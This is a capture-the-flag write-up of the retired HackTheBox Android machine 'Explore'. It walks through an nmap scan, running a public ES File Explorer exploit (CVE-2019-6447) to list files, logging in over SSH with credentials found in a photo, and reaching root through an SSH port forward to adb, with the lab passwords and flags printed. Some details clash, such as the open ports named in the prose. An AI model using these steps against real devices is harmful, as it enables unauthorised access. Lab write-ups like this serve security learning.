HTB: Exlore
Posted on 01 Nov 2021 in security • 3 min read
This is a writeup about a retired HacktheBox machine:
Explorer created by
bertolis and publish on
June 26, 2021.
This box is classified as an easy machine. The user part involves an Android
exploit for ES File Explorer and the root part a simple port forward and an adb shell.
User
Reco
We start with an nmap scan. Only ports 22 (SSH) and 8080 (HTTP) are open.
# Nmap 7.91 scan initiated Sat Jul 10 02:07:06 2021 as: nmap -sSV -A -p- -oN notes.md 10.129.153.142
Nmap scan report for 10.129.153.142
Host is up (0.012s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
33427/tcp open unknown
<SNIP>
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<SNIP>
The nmap scan hint us that the "box" is an Android device (port 5555 for adb, Banana ssh server and ES File Explorer).
A quick google search "ES File Explorer exploit" allows us to find an arbitrary file read exploit.
We run it and are able to list the files on the Android phone but nothing there
will give us a shell (we are still abe to get the user flag).
We list the pictures and found the creds.png file.
└─$ python3 50070.py listPics 10.129.153.142
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
The file is a picture of (beautifully) handwritten credential: kristi:Kr1sT!5h@Rp3xPl0r3!
We can use this credentials to connect using SSH and get the user flag.
└─$ ssh kristi@10.129.153.142 -p2222 #Kr1sT!5h@Rp3xPl0r3!
Password authentication
Password:
Password authentication
Password:
Password authentication
Password:
kristi@10.129.153.142's password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
:/ $ cat /sdcard/user.txt
f32017174c7c7e8f50c6da52891ae250
Root
We saw in out initial port scan that the port 5555 (adb) was filtered. We use SSH to access the port directly from the device by creating an SSH Local forward tunnel.
└─$ ssh -L 5557:127.0.0.1:5555 kristi@10.129.43.55 -p2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76)
In another terminal we can run adb to list the device, connect to the box,
run a shell as root and grab the flag.
└─$ adb devices
List of devices attached
127.0.0.1:5557 device
└─$ adb connect 127.0.0.1:5557
already connected to 127.0.0.1:5557
└─$ adb -s 127.0.0.1:5557 shell 1 ⨯
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
:/ # find / -name 'root.txt' 2> /dev/null
/data/root.txt
1|:/ # cat data/root.txt
f04fc82b6d49b41c9b08982be59338c5
Wrapping up
A "quick" and easy box. I spent way to much time on the root part as my adb
demon was acting weirdly and I thought the issue was on my port forwarding.